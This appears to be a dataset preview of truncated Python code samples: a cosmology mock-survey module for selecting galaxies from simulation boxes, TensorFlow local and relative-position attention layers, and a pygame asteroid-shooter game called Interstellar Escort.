input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
1], zkey: xyz[:, 2]})
else:
already_done = {xkey, ykey, zkey}.issubset(datanames)
if not already_done:
rdz = self._get_rdz(realspace=realspace, dataset=dataset)
xyz = self.rdz2xyz(rdz)
util.update_table(dataset, {xkey: xyz[:, 0], ykey: xyz[:, 1], zkey: xyz[:, 2]})
xyz = util.xyz_array(dataset, keys=[xkey, ykey, zkey])
return xyz
def _get_vel(self, realspace=False, dataset=None,
halo_vel_factor=None, gal_vel_factor=None):
dataset, datanames, selection = self._get_dataset(dataset)
if halo_vel_factor is None:
halo_vel_factor = self.halo_vel_factor
if gal_vel_factor is None:
gal_vel_factor = self.gal_vel_factor
if realspace or dataset is self._rands:
if len(datanames) == 0:
length = 1
else:
length = len(dataset[list(datanames)[0]])
return np.zeros((length, 3))
else:
if not (halo_vel_factor is None) or not (gal_vel_factor is None):
return util.factor_velocity(
util.xyz_array(self.simbox.gals,
keys=['vx', 'vy', 'vz'])[selection],
util.xyz_array(self.simbox.gals,
keys=['halo_vx', 'halo_vy', 'halo_vz'])[selection],
halo_vel_factor=halo_vel_factor,
gal_vel_factor=gal_vel_factor,
inplace=True)
else:
return util.xyz_array(self.simbox.gals,
keys=['vx', 'vy', 'vz'])[selection]
def _get_redshift(self, realspace=False, dataset=None):
dataset, datanames, selection = self._get_dataset(dataset)
if dataset is self._rands:
realspace = True
if realspace:
zkey = 'redshift_real'
else:
zkey = 'redshift'
already_done = zkey in datanames
if not already_done:
xyz = self._get_xyz(realspace=realspace, dataset=dataset)
if self.cartesian_distortion:
dist = xyz[:, 2] - self.origin[None, 2]
else:
dist = np.sqrt(np.sum((xyz - self.origin[None, :]) ** 2, axis=1))
vr = np.zeros(dist.shape)
redshift = util.distance2redshift(dist, self.simbox.cosmo, vr, self.zprec)
util.update_table(dataset, {zkey: redshift})
redshift = dataset[zkey]
return redshift
def _make_selection(self, dataset=None):
if self.cartesian_selection:
data = self._get_xyz(realspace=self.realspace_selection, dataset=dataset)
else:
data = self._get_rdz(realspace=self.realspace_selection, dataset=dataset)
selection = self.apply_selection(data, input_is_distance=self.cartesian_selection)
collisions = util.sample_fraction(len(selection), self.collision_fraction)
selection[collisions] = False
return selection
def _get_dataset_helper(self, dataset):
if not isinstance(dataset, str):
return dataset
elif dataset.lower().startswith("gal"):
return self._gals
elif dataset.lower().startswith("sim"):
return self.simbox.gals
elif dataset.lower().startswith("rand"):
return self._rands
else:
return dataset
def _get_dataset(self, dataset):
dataset = self._get_dataset_helper(dataset)
if dataset is None or dataset is self._gals:
dataset = self._gals
datanames = dataset.keys()
if 'selection' in self.__dict__:
selection = self.selection
else:
selection = slice(None)
elif dataset is self.simbox.gals:
datanames = dataset.colnames
selection = slice(None)
elif dataset is self._rands:
if dataset == {}:
self.make_rands()
dataset = self._rands
datanames = dataset.keys()
selection = slice(None)
else:
raise ValueError("Cannot interpret dataset=%s; must be in {'gals', 'simbox', 'rands'}" % dataset)
return dataset, datanames, selection
def _select_within_simbox(self, data):
"""Construct boolean selection mask to ensure no data is outside the SimBox"""
lower = np.array([0., 0., 0.])
upper = self.simbox.Lbox - lower
select_lower = np.all(data >= lower[None, :], axis=1)
select_upper = np.all(data <= upper[None, :], axis=1)
selection = select_lower & select_upper
# =============================================================================
# if np.any(~selection):
# print(np.where(~selection), "which is a fraction of", np.where(~selection)[0].size / selection.size, flush=True)
# print("WARNING: Attempting to make a selection beyond the extents of the SimulationBox.", flush=True)
# =============================================================================
return selection
def _cartesian_distortion_xyz(self, realspace=False, dataset=None):
xyz = self._get_xyz(realspace=True, dataset=dataset)
v = self._get_vel(realspace=realspace, dataset=dataset)[:, 2]
xyz_red = return_xyz_formatted_array(xyz[:, 0], xyz[:, 1], xyz[:, 2], velocity=v,
velocity_distortion_dimension="z",
cosmology=self.simbox.cosmo, redshift=self.simbox.redshift,
period=self.simbox.Lbox)
return xyz_red.astype(np.float32)
def _redshift_distortion_rdz(self, realspace=False, dataset=None):
xyz = self._get_xyz(realspace=True, dataset=dataset)
vel = None if realspace else self._get_vel(dataset=dataset)
return self.xyz2rdz(xyz, vel)
def _centers_to_origin(self):
# Cast to numpy arrays
self.center = np.asarray(self.center, dtype=np.float32)
self.center_rdz = np.array([*self.center_rdz[:2], self.simbox.redshift], dtype=np.float32)
# Set the (cartesian) center as if center_rdz = [0,0,redshift]
close_dist = self.simbox.cosmo.comoving_distance(
self.simbox.redshift - self.delta_z / 2.).value * self.simbox.cosmo.h
center_dist = close_dist + self.get_shape()[2] / 2.
origin = self.center - np.array([0., 0., center_dist], dtype=np.float32)
points = np.array([[0., 0., 0.], [self.simbox.Lbox[0], 0., 0.]]) + origin
ra = util.ra_dec_z(points, np.zeros_like(points), self.simbox.cosmo)[:, 0]
ra = abs(ra[1] - ra[0]) * math.sqrt(2.)
Lbox_rdz = np.array([ra, ra, self.delta_z], dtype=np.float32)
return origin, Lbox_rdz
class MockSurvey:
"""
MockSurvey(simbox, rdz_centers, **kwargs)
Conduct a mock observation of a multi-field survey of galaxies contained in a SimBox, via celestial selection ONLY (i.e., galaxies selected by ra, dec, redshift)
Arguments
---------
simbox : SimBox object
SimBox object containing halos and galaxies from which to select and observe
rdz_centers : ndarray of shape (ncenters,2) or (ncenters,3)
List of ra,dec coordinates to place the centers of the fields of this survey
All keyword arguments are passed to MockField object (**see MockField documentation below**)
"""
def __init__(self, simbox, rdz_centers, **kwargs):
self._kwargs_ = {**kwargs, "simbox": simbox,
"rdz_centers": rdz_centers}
# Initialize the MockFields in their specified positions
self.fields = [simbox.field(center_rdz=c, **kwargs) for c in rdz_centers]
# Create selection function that only counts each galaxy ONCE
mgid = []
for field in self.fields: mgid += field.get_mgid().tolist()
self.mgid, self.selection = np.unique(np.asarray(mgid), return_index=True)
# Hacky/lazy way of defining the methods get_data, get_vel, etc.
# using the corresponding MockField methods
# accessors = [x for x in dir(MockField) if ((not x.startswith("_")) and (not x in ["make_rands","get_shape","get_rands"]))]
accessors = ["get_data", "get_dist", "get_mgid", "get_redshift", "get_vel"]
for accessor in accessors:
unbound = (
lambda accessor: lambda self, rdz=False, realspace=False: self._field2survey(accessor, rdz, realspace))(
accessor)
unbound.__doc__ = self.fields[0].__getattribute__(accessor).__doc__
# noinspection PyArgumentList
self.__setattr__(accessor, unbound.__get__(self))
self.simbox = simbox
self.rand_density_factor = self.fields[0].rand_density_factor
self.origin = self.fields[0].origin
self.center = kwargs.get("center", simbox.Lbox / 2.)
self.center_rdz = np.array([0., 0., simbox.redshift], dtype=np.float32)
def field_selector(self, rdz):
s = [field.field_selector(rdz) for field in self.fields]
return np.any(s, axis=0)
def redshift_selector(self, redshift):
s = [field.redshift_selector(redshift) for field in self.fields]
return np.any(s, axis=0)
def get_rands(self, rdz=False):
if not hasattr(self, "rand_rdz"):
self.make_rands()
if rdz:
return self.rand_rdz
else:
return self.rand_xyz
def get_shape(self, rdz=False, return_lims=False):
centers = np.array([field.center_rdz if rdz else field.center for field in self.fields])
shapes = np.array([field.get_shape(rdz=rdz) for field in self.fields])
lower, upper = centers - shapes / 2., centers + shapes / 2.
lower, upper = np.min(lower, axis=0), np.max(upper, axis=0)
if return_lims:
return lower, upper
else:
return upper - lower
def make_rands(self, density_factor=None, seed=None):
if density_factor is None:
density_factor = self.rand_density_factor
density = density_factor * self.simbox.get_density()
lims = np.asarray(self.get_shape(rdz=True, return_lims=True)).T
lims[2] = np.asarray(self.get_shape(rdz=False, return_lims=True)).T[2]
N = density * util.volume_rdz(*lims)
self.rand_rdz = util.rand_rdz(N, *lims, seed=seed).astype(np.float32)
selections = [field.apply_selection(self.rand_rdz, input_is_distance=True) for field in self.fields]
selection = np.any(selections, axis=0)
self.rand_rdz = self.rand_rdz[selection]
self.rand_xyz = self.rdz2xyz(self.rand_rdz, input_is_distance=True)
def _field2survey(self, funcstring, rdz, realspace):
ans = []
kwargs = [("rdz", rdz), ("realspace", realspace)]
kwargs = {kwkey: kwval for kwkey, kwval in kwargs if
kwkey in getfullargspec(self.fields[0].__getattribute__(funcstring))[0]}
for field in self.fields: ans += field.__getattribute__(funcstring)(**kwargs).tolist()
ans = np.asarray(ans, dtype=np.float32)[self.selection]
return ans
MockSurvey.__doc__ += MockField.__doc__
class PFSSurvey(MockSurvey):
def __init__(self, simbox=None, center=None, threshold=-21):
simname = "smdpl"
redshift = 1.35
Nbox = (1, 1, 3)
threshold = threshold
scheme = "hexagon"
delta_z = 0.7
sqdeg_total = 15.
collision_fraction = 0.3
numfield = 10
sqdeg_each = sqdeg_total / numfield
if simbox is None:
simbox = SimBox(simname=simname, redshift=redshift, Nbox=Nbox, threshold=threshold)
if center is None:
center = simbox.Lbox / 2.
emptyfield = simbox.field(delta_z=delta_z, sqdeg=sqdeg_each, scheme=scheme, empty=True)
w, h, _ = emptyfield.get_shape(rdz=True)
w *= 3. / 4.
h *= 0.5
centers = [[-3 * w, 0], [-2 * w, h], [-2 * w, -h], [-w, 0], [0, h], [0, -h],
[w, 0], [2 * w, h], [2 * w, -h], [3 * w, 0]]
assert (len(centers) == numfield)
MockSurvey.__init__(self, simbox, scheme=scheme, rdz_centers=centers, center=center, delta_z=delta_z,
sqdeg=sqdeg_each, collision_fraction=collision_fraction)
def wp_jackknife(self):
data = self.get_data()
rands = self.get_rands()
data2b = self.get_data(rdz=True)
rand2b = self.get_rands(True)
centers = [field.center_rdz for field in self.fields]
boxshape = self.fields[0].get_shape(1)
nbins = (2, 2, 1)
func = cf.wp_rp
args = np.logspace(-0.87, 1.73, 14), 50. # rpbins, pimax
wp, covar = cf.block_jackknife(data, rands, centers, boxshape, nbins, data2b, rand2b, func, args,
rdz_distance=False, debugging_plots=True)
return wp, covar
class SimBox:
"""
SimBox(**kwargs)
Stores all data for the halos, galaxies, and the model dictating their connection.
Default Values:
- **simname** = "smdpl"
- **version_name** = None
- **hodname** = "zheng07"
- **cosmo** = cosmology.FlatLambdaCDM(<Bolshoi-Planck parameters>)
- **redshift** = 1.0
- **threshold** = 10.5
- **populate_on_instantiation** = True
- **dz_tol** = 0.1
- **Nbox** = [1, 1, 1]
- **rotation** = None
- **empty** = False
- **Lbox** = [400., 400., 400.] (if empty=True)
- **volume** = None
Keyword Arguments
-----------------
simname : string
Identifies the halo table to use; options: {"smdpl", "bolshoi", "bolplanck", "multidark", "consuelo"}
version_name : string
Identifies the version of the halo table to use (version string is set during creation of the Cached Halo Catalog)
hodname : string
Identifies the HOD model to dictate the galaxy-halo connection
cosmo : cosmology.Cosmology object
Used primarily to convert comoving distance to redshift
redshift : float
The redshift of the dark matter simulation snapshot
threshold : float
Only galaxies larger than this value (of stellar mass/absolute magnitude) will be populated
| |
n, h]) + pos_emb)
def _AttenContext(self, theta, probs, value):
# TODO(jamesqin): optimize it.
encoded = tf.einsum('BNij,BjNH->BiNH', probs, value)
if not self.params.skip_value_emb:
encoded += tf.einsum('BNij,ijNH->BiNH', probs,
self._RelativePositionValueEmb(theta, value))
return encoded
def _AttenContextOneStep(self, theta, probs, value, time_step):
s, b, _, _ = py_utils.GetShape(value, 4)
n = self.params.num_heads
h = self.params.hidden_dim // n
logits = tf.einsum('SBN,SBNH->BNH', probs, tf.reshape(value, [s, b, n, h]))
if not self.params.skip_value_emb:
# [1, S]
rel_dists = tf.expand_dims(time_step - tf.range(s), 0)
# [1, S, rel_pos_emb_dim]
pos_emb = self.value_emb.FProp(theta.value_emb, rel_dists)
if hasattr(self, 'value_pos_proj'):
# [1, S, N, H]
pos_emb = self.value_pos_proj.FProp(theta.value_pos_proj, pos_emb)
pos_emb = tf.squeeze(pos_emb, 0)
else:
pos_emb = tf.reshape(pos_emb, [s, n, h])
logits += tf.einsum('SBN,SNH->BNH', probs, pos_emb)
return logits
def ExtendStep(self,
theta,
query_vec,
cached_key_vec,
cached_value_vec,
paddings,
segment_mask,
per_step_padding,
time_step,
use_short_seq_opt=False):
# TODO(jamesqin): support use_short_seq_opt.
assert not use_short_seq_opt
return super(MultiHeadedAttentionRPE,
self).ExtendStep(theta, query_vec, cached_key_vec,
cached_value_vec, paddings, segment_mask,
per_step_padding, time_step,
use_short_seq_opt)
@classmethod
def FPropMeta(cls, p, *args):
return NotImplementedError()
class LocalCausalSelfAttention(MultiHeadedAttention):
"""Dot-product causal self attention using a sliding window.
We use the following capital letters to denote certain
tensor parameters.
B = batch size
S=T= length of the key/value (source) and query (target)
D = model dimension
N = number of attention heads
H = dimensions of each attention head
W = block size
L = left context size, including left L-1 positions and self
R = right context size
F = L + R = context size of one position.
C = L + R + W - 1 = context size of a block of W positions.
U = ceiling(T/W).
The key difference to base class is on calculating logits:
Base class:
1) Compute the full S x T attention.
2) Apply a S x T mask to enforce local attention window.
This implementation:
1) Compute a W x C attention for each of the U blocks. Where the i-th
block has query[W*i:W*(i+1)] and key[W*(i-1)-L-1:W*(i+1)+R].
2) Apply a W x C mask for each block.
Effectively, we reduce both time and space complexities for computing the
sliding window attention from O(S * T) to O(S * C). In practice we observe
reduced HBM usage on TPU but no speed gains.
Note: Cross attention is not supported. As a result in speech models this
class can only be used for encoder.
TODO(weihan): add masking based local attention to the base class.
"""
@classmethod
def Params(cls):
"""Params for LocalCausalSelfAttention."""
p = super(LocalCausalSelfAttention, cls).Params()
p.Define(
'block_size', None, 'Size of a processing block, if unset, default to '
'max(1, left_context-1).')
p.Define(
'left_context', None, 'Number of left positions to attend '
'(including current position).')
p.Define('right_context', 0, 'Number of right positions to attend.')
return p
@base_layer.initializer
def __init__(self, params):
"""Constructs a LocalCausalSelfAttention object."""
super(LocalCausalSelfAttention, self).__init__(params)
p = self.params
assert p.left_context >= 1, 'Left context should be at least one.'
assert not p.packed_input, 'Packed input not implemented yet.'
if p.block_size is None:
p.block_size = max(1, p.left_context - 1)
tf.logging.warning('block_size not set, use default value {}'.format(
p.block_size))
assert not p.packed_input, 'Packed input not implemented yet.'
def _AttenLogits(self, theta, query, key):
return tf.einsum('BUTNH,BUSNH->BNUTS', query, key)
def AttenProbs(self,
theta,
query,
key,
paddings,
segment_mask,
unused_per_step_padding=None):
"""Compute attention probability.
Args:
theta: A `.NestedMap` object containing weights' values of this layer and
its children layers.
query: [B, T, N, H].
key: [B, S=T, N, H].
paddings: [B, T].
segment_mask: [B, 1, T, S] not used right now.
unused_per_step_padding: Not used.
Returns:
logits: [B, U, N, W, 2 * W]
"""
p = self.params
key = py_utils.HasRank(key, 4)
b, t, n, h = py_utils.GetShape(key, 4)
paddings = py_utils.HasShape(paddings, [b, t])
query = py_utils.HasShape(query, [b, t, n, h])
# -> [B, U, C, N, H]
key_block_context = relative_atten_util.ExtractBlockContext(
key,
block_size=p.block_size,
left_context=p.left_context,
right_context=p.right_context)
_, u, c, _, _ = py_utils.GetShape(key_block_context)
# -> [B, U, W, N, H]
query_blocks = relative_atten_util.ConvertToBlocks(
query, block_size=p.block_size)
_, _, w, _, _ = py_utils.GetShape(query_blocks)
# -> [B, U, C]
paddings_block_context = relative_atten_util.ExtractBlockContext(
paddings,
block_size=p.block_size,
left_context=p.left_context,
right_context=p.right_context,
padding_val=1)
# -> [B, N, U, W, C]
paddings = tf.tile(
tf.reshape(paddings_block_context, [b, 1, u, 1, c]), [1, n, 1, w, 1])
# Make local casual paddings.
# -> [U, W, C]
local_causal_padding = relative_atten_util.MakeCausalPadding(
seq_len=t,
block_size=p.block_size,
left_context=p.left_context,
right_context=p.right_context)
paddings += local_causal_padding
# -> [B, N, U, W, C]
logits = self._AttenLogits(theta, query_blocks, key_block_context)
very_negative_logits = (
tf.ones_like(logits) * logits.dtype.max *
tf.constant(-0.7, dtype=logits.dtype))
padded_logits = tf.where(paddings > 0.0, very_negative_logits, logits)
probs = tf.nn.softmax(padded_logits)
return probs
def _DotAtten(self,
theta,
query,
key,
value,
paddings,
segment_mask,
per_step_padding=None):
"""Main attention function.
Args:
theta: A `.NestedMap` object containing weights' values of this layer and
its children layers.
query: [B, T, N, H].
key: [B, S=T, N, H].
value: [B, S=T, N, H].
paddings: [B, S=T].
segment_mask: [B, 1, S=T, S=T].
per_step_padding: A mask of shape [B, T, S=T] if not None.
Returns:
encoded: [B, T, N, H].
atten_probs: [B, N, T, S].
"""
p = self.params
# Scale the query projection.
if p.enable_per_dim_scale:
query = self.per_dim_scale.FProp(theta.per_dim_scale, query)
else:
query *= (p.hidden_dim // p.num_heads)**-0.5
t0 = py_utils.GetShape(query)[1]
# -> [B, N, U, W, C]
probs = self.AttenProbs(theta, query, key, paddings, segment_mask,
per_step_padding)
# Apply dropout to probs.
probs = self.atten_dropout.FProp(theta.atten_dropout, probs)
# -> [B, U, C, N, H]
value_block_context = relative_atten_util.ExtractBlockContext(
value,
block_size=p.block_size,
left_context=p.left_context,
right_context=p.right_context)
# Compute the attention context vector.
# -> [B, U, W, N, H]
encoded = tf.einsum('BNUWC,BUCNH->BUWNH', probs, value_block_context)
b, u, w, n, h = py_utils.GetShape(encoded)
encoded = tf.reshape(encoded, [b, u * w, n, h])
# Remove the extra time padding introduced by converting to blocks.
encoded = encoded[:, :t0, ...]
return encoded, probs
def ExtendStep(self,
theta,
query_vec,
cached_key_vec,
cached_value_vec,
paddings,
segment_mask,
per_step_padding,
time_step,
use_short_seq_opt=False):
raise NotImplementedError()
@classmethod
def FPropMeta(cls, p, *args):
raise NotImplementedError()
class LocalCausalSelfAttentionXL(LocalCausalSelfAttention):
"""Local causal version of transformer-xl self attention."""
@classmethod
def Params(cls):
p = super(LocalCausalSelfAttentionXL, cls).Params()
p.Define('rel_pos_emb_dim', None,
'Dimension of relative positional embedding.')
return p
@base_layer.initializer
def __init__(self, params):
"""Constructs a LocalCausalSelfAttentionXL object."""
super(LocalCausalSelfAttentionXL, self).__init__(params)
params = self.params
if params.rel_pos_emb_dim is None or params.rel_pos_emb_dim <= 0:
raise ValueError('Invalide rel_pos_emb_dim: %s' % params.rel_pos_emb_dim)
with tf.variable_scope(params.name):
emb_params = layers.PositionalEmbeddingLayer.Params().Set(
embedding_dim=params.rel_pos_emb_dim)
self.CreateChild('pos_emb', emb_params)
# Projection layer for relative position encoding
dim_per_head = params.hidden_dim // params.num_heads
pos_proj_tpl = params.proj_tpl.Copy().Set(
input_dim=params.rel_pos_emb_dim,
num_heads=params.num_heads,
dim_per_head=dim_per_head,
use_bias=False)
self.CreateChild('pos_proj', pos_proj_tpl)
u_pc = py_utils.WeightParams(
shape=[params.num_heads, dim_per_head],
init=py_utils.WeightInit.Constant(0.0),
dtype=params.dtype,
collections=[self.__class__.__name__ + '_vars'])
v_pc = py_utils.WeightParams(
shape=[params.num_heads, dim_per_head],
init=py_utils.WeightInit.Constant(0.0),
dtype=params.dtype,
collections=[self.__class__.__name__ + '_vars'])
self.CreateVariable('u', u_pc)
self.CreateVariable('v', v_pc)
def _AttenLogits(self, theta, query, key):
b, u, w, _, _ = py_utils.GetShape(query)
_, _, c, _, _ = py_utils.GetShape(key)
n = self.params.num_heads
l = self.params.left_context
r = self.params.right_context
f = l + r
# term a and c
term_ac = tf.einsum('BUTNH,BUSNH->BNUTS', query + theta.u, key)
# term b and d
# [1, F]
pos = tf.expand_dims(tf.range(l - 1, -r - 1, -1), 0)
sin_emb = self.pos_emb.FPropWithPosition(theta.pos_emb, pos)
# [1, F, N, H]
sin_emb = self.pos_proj.FProp(theta.pos_proj, sin_emb)
# [F, N, H]
sin_emb = tf.squeeze(sin_emb, 0)
# [B, N, U, W, F]
term_bd = tf.einsum('BUWNH,FNH->BNUWF', query + theta.v, sin_emb)
# Perform relative shift in order to get [B, N, U, W, C]
# Pads the input to [B, N, U, C, C+1]
term_bd = tf.pad(term_bd,
((0, 0), (0, 0), (0, 0), (0, c - w), (0, c + 1 - f)))
# Reshapes to [B, N, U, C+1, C]. Note the output last dim is 1-smaller
# than the input, which "pushses" one element off to the next row for each
# row. The accumulated effect is row_i is right-shifted i steps (i>=0).
term_bd = tf.reshape(term_bd, [b, n, u, c + 1, c])
# Keeps useful slices. [B, N, U, W, C]
term_bd = tf.slice(term_bd, [0, 0, 0, 0, 0], [-1, -1, -1, w, -1])
return term_ac + term_bd
class TransformerAttentionLayer(base_layer.BaseLayer):
"""Multiheaded attention sub-layer in Transformer layer.
Input is first normalized using Layer Normalization. Output of layer
normalization is processed using multi-headed attention. And finally, the
output of the attention layer is combined with the residual connection.
This layer will be used in the following | |
<reponame>jgarwin95/Interstellar_Escort<filename>Interstellar_Escort.py
import pygame
import random
import os
import time
class Boundary:
'''Generate pygame display window.
Args:
width (int): width of display in number of pixels
height(int): height of display in number of pixels
'''
back_ground = pygame.image.load('Background_images/p.png')
def __init__(self, width, height):
self.width = width
self.height = height
self.window = pygame.display.set_mode((self.width, self.height))
pygame.display.set_caption('Interstellar Escort')
class Mothership:
'''Mothership object is displayed at the bottom of screen and the objective is to protect it.
Class Attributes:
image (pygame image): 50x500 image displayed onscreen
Attributes:
x (int): x coordinate image location
y (int): y coordinate image location
health_amt (int): initial health amount
damage_taken (int): initial damage amount
total (int): combination of health and damage amounts
hbar_x (int): x coordinate of health bar
hbar_y (int): y coordinate of health bar
hbar_length (int): length of health bar (constant for calcuation purposes)
health_width int(int): ratio of remaining health over total, multiplied by health bar length
'''
image = pygame.image.load('Mothership/mothership_3_2.png')
def __init__(self):
self.x = 0
self.y = 650
self.health_amt = 1000
self.damage_taken = 0
self.total = self.health_amt + self.damage_taken
self.hbar_x = 50
self.hbar_y = 690
self.hbar_length = 450 - self.hbar_x
self.health_width = round(self.hbar_length*(self.health_amt/self.total))
#self.damage_width = round(self.hbar_length*(self.damage_taken/self.total))
def update_damage(self):
'''Update instance's health amount and width of health bars'''
if self.health_amt > 1000: # if health is above initial amt of 1000 due to powerup reduce in size to original
self.health_amt = 1000
self.health_width = round(self.hbar_length*(self.health_amt/self.total))
def draw(self, window):
'''Draw sprite and health bars to screen
Args:
window (Boundary obj): window attribute of Boundary object
'''
window.blit(Mothership.image, (int(self.x), int(self.y)))
# Damage bar is constant length. Covered over by health bar.
pygame.draw.rect(window, (255,0,0), (self.hbar_x, self.hbar_y, self.hbar_length, 7))
# Draw over damage bar. Damage bar is revealed as health is depleted.
if self.health_amt > 0:
pygame.draw.rect(window, (0,255,0),(self.hbar_x, self.hbar_y, self.health_width, 7))
class Character:
'''Character class is main sprite (spaceship) for this game.
Class Attributes
center_images (pygame image): images displaying ship in upright postion
strafing_right_images (pygame image): intermediate images for right turns
strage_right_on (pygame image): final images for right turns
strafing_left_images (pygame image): intermediate images for left turns
strafe_left_on (pygame image): final images for left turns
Attributes
width (int): width of character image in pixels
height (int): height of character image in pixels
x (int): initial x coordinate position of character
y (int): initial y coordinate position of character
velocity (int): rate at which character moves from left to right
left (bool): indicate initial movement setting (for image displaying purposes)
right (bool): indicate initial movement setting
center (bool): indicate initial movement setting
'''
# images used when no keys are pressed
center_images = [pygame.image.load('main_sprite/planes_02A-center1.png'), pygame.image.load('main_sprite/planes_02A-center2.png'), pygame.image.load('main_sprite/planes_02A-center3.png'), pygame.image.load('main_sprite/planes_02A-center4.png')]
# images used inbetween full strafe right
strafing_right_images = [pygame.image.load('main_sprite/planes_02A-strafe_right5.png'),pygame.image.load('main_sprite/planes_02A-strafe_right6.png'),pygame.image.load('main_sprite/planes_02A-strafe_right7.png'),pygame.image.load('main_sprite/planes_02A-strafe_right8.png')]
# images used at full right strafe
strafe_right_on = [pygame.image.load('main_sprite/planes_02A-R9.png'), pygame.image.load('main_sprite/planes_02A-R10.png'), pygame.image.load('main_sprite/planes_02A-R11.png'), pygame.image.load('main_sprite/planes_02A-R12.png')]
# images used inbetween full strafe left
strafing_left_images = [pygame.image.load('main_sprite/planes_02A-strafe_left5.png'), pygame.image.load('main_sprite/planes_02A-strafe_left6.png'), pygame.image.load('main_sprite/planes_02A-strafe_left7.png'), pygame.image.load('main_sprite/planes_02A-strafe_left8.png')]
# images used at full left strafe
strafe_left_on = [pygame.image.load('main_sprite/planes_02A-L9.png'), pygame.image.load('main_sprite/planes_02A-L10.png'), pygame.image.load('main_sprite/planes_02A-L11.png'), pygame.image.load('main_sprite/planes_02A-L12.png')]
def __init__(self):
self.width = 96
self.height = 96
self.x = 200
self.y = 540
self.velocity = 5
self.left = False # Initial movement position states of sprite
self.right = False
self.center = True
def draw(self, left_right_frame, center_frame, most_recent_key, window):
'''Draw the mainsprite to the screen
Args
left_right_frame (int): incrementing number that controls which frame is selected for displaying when moving right/left
center_frame (int): incrementing number that controls which frame is selected when not turning
most_recent_key (str): most recently pressed movement key.
window (Boundary obj): screen on which image is displayed
'''
if self.center == True:
if left_right_frame < 4:
if most_recent_key == 'r':
window.blit(self.strafing_right_images[left_right_frame],
(self.x, self.y)) # level out spaceship upon returning to center
elif most_recent_key == 'l':
window.blit(self.strafing_left_images[left_right_frame],
(self.x, self.y)) # level out spacehip upon returning to center
else:
window.blit(self.center_images[center_frame],
(self.x, self.y)) # iterate through displaying center images
elif self.right == True:
if left_right_frame < 4: # first 4 frames are transition state
window.blit(self.strafing_right_images[left_right_frame],
(self.x, self.y)) # draw strafe right transition
else:
window.blit(self.strafe_right_on[left_right_frame % 4],
(self.x, self.y)) # draw final strafe right
elif self.left == True:
if left_right_frame < 4: # first 4 frames are transition state
window.blit(self.strafing_left_images[left_right_frame],
(self.x, self.y)) # draw strafe left transition
else:
window.blit(self.strafe_left_on[left_right_frame % 4],
(self.x, self.y)) # draw final strafe left
def move_left(self, boundary):
'''Move character in the left direction by velocity amount
Args
boundary (Boundary obj): Boundary width is used to know movement limit
'''
if self.x > 0: # keeping x coordinate within the bounds of the screen
self.x = self.x - self.velocity # move by velocity amt
def move_right(self, boundary):
'''Move character in the right direction by velocity amount
Args
boundary (Boundary obj): Boundary width is used to know movement limit
'''
if self.x < boundary.width - self.width:
self.x = self.x + self.velocity
def shoot(self, shot_type):
'''Generate ShooterObject object at the center position of the main sprite
Args
shot_type (str): specifies the type of shot generated. Could be used to change shot types in future use.
'''
# generate shot object at current sprite location, in the middle of the sprite
ShooterObject.shots_queue.append(ShooterObject(shot_type, (self.x + (self.width/2)), self.y))
class Asteroid:
'''Asteroid class generates asteroids images above the display height and progresses them downward
Class Attributes
astoird_images (dict): dictionary of asteroid pygame images with keys specifying the size of the asteroid
width_options (list): list containing the various width options
ast_diff_setting (dict): dictionary for difficulty setting.
Keys are levels of difficult and values are average number of game loops per asteroid generation
current_setting (int): current difficulty setting
maximum_asteroid_amount (int): limit on the current number of existing asteroid
Attributes
width (int): width of asteroid choosen
color_option (int): color of asteroid choosen
y (int): y coordinate of asteroid spawn
x (int): x coordinate of asteroid spawn
velocity (int): speed at which asteroid progresses down screen
damage_taken (int): amount of damage sustained
health_amt (int): amount of health
damage (int): amount of damage dealt
hbar_length (int): length of health bar
initial_health_width (int): length of health bar as a constant
destruction method (None): method by which the asteroid has been destroyed
'''
asteroid_images = {50:[pygame.image.load('Asteroids/res50.png'),pygame.image.load('Asteroids/res50_1.png'),pygame.image.load('Asteroids/res50_2.png'),pygame.image.load('Asteroids/res50_3.png'),pygame.image.load('Asteroids/res50_4.png')],\
60:[pygame.image.load('Asteroids/res60.png'),pygame.image.load('Asteroids/res60_1.png'),pygame.image.load('Asteroids/res60_2.png'),pygame.image.load('Asteroids/res60_3.png'),pygame.image.load('Asteroids/res60_4.png')],\
70:[pygame.image.load('Asteroids/res70.png'),pygame.image.load('Asteroids/res70_1.png'),pygame.image.load('Asteroids/res70_2.png'),pygame.image.load('Asteroids/res70_3.png'),pygame.image.load('Asteroids/res70_4.png')],\
80:[pygame.image.load('Asteroids/res80.png'),pygame.image.load('Asteroids/res80_1.png'),pygame.image.load('Asteroids/res80_2.png'),pygame.image.load('Asteroids/res80_3.png'),pygame.image.load('Asteroids/res80_4.png')],\
90:[pygame.image.load('Asteroids/res90.png'),pygame.image.load('Asteroids/res90_1.png'),pygame.image.load('Asteroids/res90_2.png'),pygame.image.load('Asteroids/res90_3.png'),pygame.image.load('Asteroids/res90_4.png')],\
100:[pygame.image.load('Asteroids/res100.png'),pygame.image.load('Asteroids/res100_1.png'),pygame.image.load('Asteroids/res100_2.png'),pygame.image.load('Asteroids/res100_3.png'),pygame.image.load('Asteroids/res100_4.png')]}
width_options = [x for x in range(50,110,10)]
asteroid_lst = []
ast_diff_setting = {1:1000, 2:800, 3: 600, 4: 400, 5:200, 6:100, 7:50}
current_setting = 6
maximum_asteroid_amount = 9
def __init__(self):
self.width = random.choice(Asteroid.width_options) # randomly choosing width option from width_options
self.color_option = random.randint(0,4) # randomly choosing an index number to pick from various images
self.y = self.width*-1 # spawns asteroids above game window
self.x = random.randrange(50, 500 - self.width) # asteroid spawn anywhere in x direction within game boundaries
if self.width < 80: # velocity is loosley tied to width
self.velocity = random.randint(2,3)
else:
self.velocity = random.randint(1,2)
self.damage_taken = 0 # the total health remains unchanged and is used to generate health bar ratio
self.health_amt = self.width*2 # health amount is directly related to the size of the asteroid
self.damage = self.width * 2 # damage dealt by asteroid is tied to size
self.hbar_length = round(self.width * 0.75) # constant length (should add up from the summations of health and damage bar widths)
self.hbar = round(self.hbar_length *
(self.health_amt/(self.health_amt + self.damage_taken))) # hbar length multiplied by percentage remaining
self.initial_health_width = self.hbar # new variable so that changing hbar will not affect the initial length of health bar
self.destruction_method = None # either destroyed by negative health or making contact with mothership
Asteroid.asteroid_lst.append(self)
def draw_asteroid(self, surface):
'''Draw asteroid on screen
Args
surface (boundary obj): surface upon which the asteroid is drawn
'''
surface.blit(Asteroid.asteroid_images[self.width][self.color_option], (self.x, self.y))
# creating damage bar (red)
if self.damage_taken > 0:
pygame.draw.rect(surface, (255,0,0), (self.x + round(self.width*0.1), round(self.y + self.width/2),
self.initial_health_width, 7))
